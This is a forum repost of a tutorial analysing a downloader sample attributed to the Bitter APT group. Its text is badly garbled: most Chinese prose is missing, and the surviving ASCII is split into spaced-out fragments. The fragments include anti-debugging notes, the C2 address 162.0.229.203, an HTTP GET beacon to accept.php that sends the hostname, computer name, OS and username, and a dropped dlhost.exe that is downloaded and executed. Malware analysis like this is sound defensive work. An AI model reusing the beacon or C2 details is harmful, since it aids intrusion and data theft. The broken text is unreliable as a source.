搜索

[16268] 2020-12-31_手把手教你分析APT:蔓灵花下载器样本分析

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-18
2020-12-31_手把手教你分析APT:蔓灵花下载器样本分析 A P T   F r e e B u f   2 0 2 0 - 1 2 - 3 1 A P T . p d f . e x e W i n d o w s . e x e e x e P D F C V T M D 5 5 2 / 6 9 Y A R A P D F S F X S F X e x e r a r 使 C : i n t e l l o g s d l h o s t . e x e
e x e 使 便 退 d l h o s t . e x e d l h o s t . e x e A P T ~ P E 便 . u d d 使 0 1 0 E d i t o r P E P E N t H e a d e r O p t i o n a l H e a d e r D l l C h a r a c t e r i s t i c s I M A G E _ D L L C H A R A C T E R I S T I C S _ D Y N A M I C _ B A S E 1 0 使 I D A 1 . 2 . / 3 . W i n d o w s 1 6 5 1 & 5 2 S l e e p I s D e b u g g e r P r e s e n t S l e e p I s D e b u g g e r P r e s e n t 1 5 P B   O D H i d e   D e b u g g e r H O O K
A P I O D A P I A l t + B B B r e a k A l t + C C 使 G e t M o d u l e H a n d l e W + G e t P r o c A d d r e s s I D A 使 I D A S h i f t + F 2 s e n d C r e a t e F i l e W R e a d F i l e W r i t e F i l e S h e l l E x e c u t e A
使 I D A M a k e N a m e E X M a k e N a m e E x ( l o n g   e a ,   s t r i n g   n a m e ,   l o n g   f l a g s ) ; N o t e p a d + + / E x c e l P y t h o n / B A T R U N 便 N I D A S t a r t F 9 I D A 4 0 1 C 8 0 i f + D o   W h i l e - =   0 x D
U R L Y e s   f i l e C r e a t e S e m a p h o r e A 7 t 5 6 y r 5 4 r G e t L a s t E r r o r E R R O R _ A L R E A D Y _ E X I S T S 1 8 3 0 x B 7 4 0 C 2 3 4 退 C r e a t e M u t e x C r e a t e S e m a p h o r e + G e t L a s t E r r o r + G e t L a s t E r r o r i f G e t L a s t E r r o r 0 x B 7 Z F I D A O D F 4 C A L L h t t p : / / 1 6 2 . 0 . 2 2 9 . 2 0 3 / R g u h s T / R g u h s T / I P i f T a b G r a p h   o v e r v i e w i f c o n n e c t T a b I D A i f 0 x 4 0 3 6 7 8 Z F
4 0 2 F 4 0 A P I G e t C o m p u t e r N a m e A C o m p u t e r N a m e 4 0 2 F 4 0 4 0 C 3 1 8 0 x 4 3 5 5 9 8 G e t C o m p u t e r N a m e A 4 0 C 3 1 8 G e t U s e r N a m e A R e g Q u e r y V a l u e E x A G e t S y s t e m I n f o 4 0 2 F 4 0 4 0 C 3 1 8 0 x 4 3 5 5 9 8 ? a = H o s t N a m e & b = C O M P U T E R N A M E & c = W i n d o w s % 2 0 7 % 2 0 P r o f e s s i o n a l & d = A d m i n i s t r a t o r A d m i n i s t r a t o r f 9 1 1 7 a 5 d - b 1 5 5 - 4 a 3 e - b 6 c 9 - 5 a e 1 8 1 2 4 7 d 3 b 1 6 5 5 3 6 0 4 0 9 6 5 8 6 0 d 使 U s e r N a m e R e g Q u e r y V a l u e E x A G U I D M A C I P G U I D C G U I D G U I D x x x x x x x x - x x x x - x x x x - x x x x - x x x x x x x x x x x x 8 - 4 - 4 - 4 - 1 2 d [ U s e r N a m e ] [ U s e r N a m e ] [ G U I D ] [ d w A c t i v e P r o c e s s o r M a s k ] [ d w A l l o c a t i o n G r a n u l a r i t y ] [ d w O e m I d ] [ d w P a g e S i z e ] [ d w P r o c e s s o r T y p e ] [ w P r o c e s s o r A r c h i t e c t u r e ] [ d w A c t i v e P r o c e s s o r M a s k ] [ d w A l l o c a t i o n G r a n u l a r i t y ] [ d w O e m I d ] [ d w P a g e S i z e ] [ d w P r o c e s s o r T y p e ] [ w P r o c e s s o r A r c h i t e c t u r e ] ~ 使 使 a   =   [ H o s t N a m e ] b   =   [ C o m p u t e r N a m e ] c   =   [ ] d   =   [ U s e r N a m e ] [ G U I D ]
I D A 4 0 1 0 8 0 S e n d 4 0 1 0 8 0 4 0 1 0 8 0 G E T H T T P / H T T P S e n d 线 线 S e n d 线 / c W i n d o w s / A P T Y A R A 线 使 V T 线 R e c v S e n d 线 R e c v R e c v 4 0 8 5 5 0 C 2 I D A C 2 R e c v 4 0 8 5 5 0 Y e s   f i l e 便 G E T   / / / R g u h s T / a c c e p t . p h p ? a = H o s t N a m e & b = C O M P U T E R N A M E & c = W i n d o w s % 2 0 7 % 2 0 P r o f e s s i o n a l & d = A d m i n i s t r a t o r A d m i n i s t r a t o r f 9 1 1 7 a 5 d - b 1 5 5 - 4 a 3 e - b 6 c 9 - 5 a e 1 8 1 2 4 7 d 3 b 1 6 5 5 3 6 0 4 0 9 6 5 8 6 0 & e = e f g h H T T P / 1 . 1 H o s t :   1 6 2 . 0 . 2 2 9 . 2 0 3 h t t p _ u r l = ? a = * b = * c = * e = U R L h t t p _ u r l = a % 3 d * b % 3 d * c % 3 d * d % 3 d G E T h t t p _ u r l = a % 3 d * b % 3 d * c % 3 d * d % 3 d & h t t p _ m e t h o d = G E T h t t p _ u r l = a % 3 d * b % 3 d * c % 3 d W i n d o w s * d % 3 d & h t t p _ m e t h o d = G E T
C 2 C 2 E I P Y e s   f i l e 退 Y e s   f i l e i f + D o W h i l e i f m e m m o v e 便 1 . / / 0 x 4 3 5 1 F 7 4 0 E B 6 1 2 . 4 0 E B 6 1 s t r c a t . e x e 3 . e x e S h e l l E x e c u t e A o p e n E X E S h e l l E x e c u t e A P E D u m p P E 线 e x e e x e D o w n l o a d e r / L o a d e r A P T 使 线 V T I P V T 线 线 I P 1 6 2 . 0 . 2 2 9 . 2 0 3 R e l a t i o n s p o p 3 w e b m a i l m a i l
C o m m u n i c a t i n g   F i l e s B e h a v i o r 1 . G E T U R L 2 . C : i n t e l l o g s d l h o s t . e x e I P D e t a i l s G o o g l e   R e s u l t s 线 I P 线 % T E M P % r g d l . e x e P D B D : C + + R e g _ E n t r y r e g _ e n R e l e a s e r e g _ e n . p d b r e g d l r g d l . e x e a u d i o d q . e x e R u n a u d i o d q . e x e e x e 线 线 线 A r t r a D o w n l o a d e r 2 0 1 9 P a l o   A l t o   N e t w o r k s I g f x s r v k . e x e L s a p . e x e M S A S e r v i c e s M S A S e r v i c e t 使 A P T T T P s M D 5 P D B C 2 A P T A P T F i l e s   D r o p p e d   =   C : i n t e l l o g s d l h o s t . e x e H T T P   R e q u e s t s   =   h t t p _ u r l = a % 3 d * b % 3 d * c % 3 d W i n d o w s * d % 3 d & h t t p _ m e t h o d = G E T
A r t r a D o w n l o a d e r ~       A P T S t r o n g P i t y
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理